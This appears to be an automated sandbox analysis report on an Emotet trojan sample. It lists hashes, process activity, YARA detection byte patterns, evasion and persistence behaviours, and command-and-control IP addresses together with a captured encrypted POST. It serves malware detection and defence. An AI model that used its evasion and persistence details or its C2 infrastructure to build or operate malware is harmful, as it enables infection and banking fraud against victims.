Play interactive tour

Edit tour

Analysis Report malware

Overview

General Information

Sample Name:	malware (renamed file extension from none to exe)
Analysis ID:	385110
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Emotet

Changes security center settings (notifications, updates, antivirus, firewall)

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w10x64

svchost.exe (PID: 1152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

malware.exe (PID: 160 cmdline: 'C:\Users\user\Desktop\malware.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

malware.exe (PID: 6072 cmdline: C:\Users\user\Desktop\malware.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

mathsearch.exe (PID: 5844 cmdline: C:\Windows\SysWOW64\mathsearch.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

mathsearch.exe (PID: 5372 cmdline: C:\Windows\SysWOW64\mathsearch.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

svchost.exe (PID: 3420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5684 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2392 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2992 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2432 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5732 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 772 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 5248 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 1968 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
malware.exe	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
malware.exe	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.202770613.0000000000051000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.202524234.0000000000051000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000000.194767898.0000000000051000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.461993128.0000000000051000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000000.193972656.0000000000051000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000000.201510577.0000000000051000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000000.200691249.0000000000051000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.mathsearch.exe.50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.mathsearch.exe.50000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 05 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 05 00 85 C0
2.0.malware.exe.50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.0.malware.exe.50000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 05 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 05 00 85 C0
4.2.mathsearch.exe.50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.mathsearch.exe.50000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 05 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 05 00 85 C0
4.0.mathsearch.exe.50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.0.mathsearch.exe.50000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 05 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 05 00 85 C0
3.0.mathsearch.exe.50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.0.mathsearch.exe.50000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 05 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 05 00 85 C0
1.0.malware.exe.50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.0.malware.exe.50000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 05 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 05 00 85 C0
1.2.malware.exe.50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.malware.exe.50000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 05 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 05 00 85 C0
2.2.malware.exe.50000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.malware.exe.50000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 05 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 05 00 85 C0
Click to see the 11 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: malware.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: malware.exe	Virustotal: Detection: 82%			Perma Link
Source: malware.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Show sources

Source: malware.exe

Joe Sandbox ML: detected

Source: malware.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: malware.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: global traffic	TCP traffic: 192.168.2.3:49729 -> 193.169.54.12:8080
Source: global traffic	TCP traffic: 192.168.2.3:49748 -> 173.230.145.224:8080
Source: global traffic	TCP traffic: 192.168.2.3:49750 -> 80.86.91.232:7080

Source: Joe Sandbox View	IP Address: 193.169.54.12 193.169.54.12
Source: Joe Sandbox View	IP Address: 193.169.54.12 193.169.54.12
Source: Joe Sandbox View	IP Address: 80.86.91.232 80.86.91.232

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 16 50 55 21 e4 18 44 7d b0 5d 87 c4 db 81 70 59 7d 54 82 67 dd 4e ee d0 7b 66 ee 69 c0 67 1a f5 7c 2e d1 06 d8 24 d8 4b 81 7a 42 97 20 c8 21 ef d9 72 53 e9 1c 3b a7 be d9 56 f5 40 91 09 1a 48 8c ec 39 06 49 c1 b2 1a 5d 19 fd 45 74 49 34 95 01 0f a9 03 1b 3e 06 f5 52 13 e7 34 64 42 5a 0b 4b 0b ef d6 cc cf 14 c8 f7 20 4a 1b ad 0c d9 85 8e b8 e1 ce e2 52 46 b1 5d 03 29 81 4f f5 c8 20 3b 24 b2 56 4d 7d 6f 68 e4 71 ad 0c 38 f6 02 86 d7 b6 c3 61 b2 aa 40 2d 7e 4b 22 ec 25 b1 5c 9f 7e 5e ab ba 96 10 6f e6 d2 69 b2 16 c9 f6 ce a5 6a c0 b9 5a f4 98 f6 5e 64 ea 57 8e 4d 36 c4 0a d1 a1 f6 7f e2 34 4e dc 49 d5 d2 b4 10 89 26 70 95 61 f9 48 a8 cd 60 dc 38 7a 39 d0 1b de 15 18 29 41 43 33 b3 7d 12 79 ef 8b e1 7b 6b 86 c4 be 04 5e ac 6a c1 64 d1 91 71 a8 6b d6 50 bb e8 3f e2 9d 06 ae a6 73 c2 7a 59 c4 8b 55 19 4a 6d b6 5b a6 2e a1 b5 56 6b 81 44 09 80 ab 33 71 53 34 d0 b0 80 26 f5 08 57 b9 59 e3 e8 a9 d1 5d a3 2d 40 e2 61 96 63 d2 e6 8f 70 43 2f aa 62 94 0a f4 3b fd 20 b9 68 30 02 fe 8c ad 75 8e 1f 8b 8a d7 d1 b3 80 b5 fb 69 62 4f 1e 16 91 3d c1 65 6a a6 61 7a 51 80 72 a9 da 21 1a a9 78 6b 0f 18 f9 a7 1f 62 e9 4c 8b 36 bf e8 23 11 1f 40 b0 e5 9a cc 81 e9 12 71 d5 cb a9 37 3f 28 d9 42 60 dc 60 9f be 12 da d2 03 7d 9f c1 ca d8 8a f2 cf 33 cd 79 4c 61 71 21 69 82 c6 da 4d 04 a1 13 56 70 18 74 61 a3 78 f9 Data Ascii: PU!D}]pY}TgN{fig|.$KzB !rS;V@H9I]EtI4>R4dBZK JRF])O ;$VM}ohq8a@-~K"%\~^oijZ^dWM64NI&paH`8z9)AC3}y{k^jdqkP?szYUJm[.VkD3qS4&WY]-@acpC/b; h0uibO=ejazQr!xkbL6#@q7?(B``}3yLaq!iMVptax

Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.232
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.232

Source: unknown

Source: svchost.exe, 00000009.00000002.465175731.000002008E80F000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000009.00000002.465175731.000002008E80F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000009.00000002.465175731.000002008E80F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000009.00000002.465492884.000002008EA00000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 0000000F.00000002.308249987.0000018A12613000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000D.00000002.462429058.000001CE4843E000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000F.00000003.307995470.0000018A1265A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000002.308290125.0000018A1264E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000F.00000003.307995470.0000018A1265A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000002.308298188.0000018A1265C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000002.308298188.0000018A1265C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000F.00000002.308290125.0000018A1264E000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.307995470.0000018A1265A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000F.00000003.307972945.0000018A12660000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.286268286.0000018A12631000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000F.00000002.308275812.0000018A1263D000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.308249987.0000018A12613000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000003.308009294.0000018A12640000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000F.00000003.286268286.0000018A12631000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000F.00000003.286268286.0000018A12631000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000F.00000002.308249987.0000018A12613000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: malware.exe, type: SAMPLE
Source: Yara match	File source: 00000002.00000002.202770613.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.202524234.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.194767898.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.461993128.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.193972656.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.201510577.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.200691249.0000000000051000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.malware.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.malware.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.malware.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.malware.exe.50000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: malware.exe, type: SAMPLE	Matched rule: Emotet Payload Author: kevoreilly
Source: 3.2.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 2.0.malware.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 4.2.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 4.0.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 3.0.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.0.malware.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.2.malware.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 2.2.malware.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly

Source: C:\Windows\SysWOW64\mathsearch.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache

Jump to behavior

Source: C:\Users\user\Desktop\malware.exe

File deleted: C:\Windows\SysWOW64\mathsearch.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\malware.exe	Code function: 1_2_00056E70		1_2_00056E70
Source: C:\Users\user\Desktop\malware.exe	Code function: 1_2_000577F0		1_2_000577F0

Source: malware.exe, 00000002.00000002.203530046.0000000002ED0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs malware.exe
Source: malware.exe, 00000002.00000002.203668153.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs malware.exe
Source: malware.exe, 00000002.00000002.203668153.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs malware.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: malware.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: malware.exe, type: SAMPLE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 3.2.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.0.malware.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 4.2.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 4.0.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 3.0.mathsearch.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.0.malware.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.2.malware.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.2.malware.exe.50000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload

Source: classification engine

Classification label: mal92.troj.evad.winEXE@18/5@0/5

Source: C:\Users\user\Desktop\malware.exe

Code function: 1_2_00052110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_00052110

Source: C:\Users\user\Desktop\malware.exe	Mutant created: \Sessions\1\BaseNamedObjects\ME3E6F353
Source: C:\Users\user\Desktop\malware.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\M9F93125B
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4912:120:WilError_01
Source: C:\Windows\SysWOW64\mathsearch.exe	Mutant created: \BaseNamedObjects\Global\I9F93125B
Source: C:\Windows\SysWOW64\mathsearch.exe	Mutant created: \BaseNamedObjects\MC1E3A882
Source: C:\Users\user\Desktop\malware.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\I9F93125B

Source: malware.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\malware.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\malware.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: malware.exe	Virustotal: Detection: 82%
Source: malware.exe	ReversingLabs: Detection: 96%

Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\Desktop\malware.exe 'C:\Users\user\Desktop\malware.exe'
Source: C:\Users\user\Desktop\malware.exe	Process created: C:\Users\user\Desktop\malware.exe C:\Users\user\Desktop\malware.exe
Source: unknown	Process created: C:\Windows\SysWOW64\mathsearch.exe C:\Windows\SysWOW64\mathsearch.exe
Source: C:\Windows\SysWOW64\mathsearch.exe	Process created: C:\Windows\SysWOW64\mathsearch.exe C:\Windows\SysWOW64\mathsearch.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\malware.exe	Process created: C:\Users\user\Desktop\malware.exe C:\Users\user\Desktop\malware.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mathsearch.exe	Process created: C:\Windows\SysWOW64\mathsearch.exe C:\Windows\SysWOW64\mathsearch.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\malware.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: malware.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\malware.exe

Code function: 1_2_00051F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

1_2_00051F40

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\mathsearch.exe

Executable created and started: C:\Windows\SysWOW64\mathsearch.exe

Jump to behavior

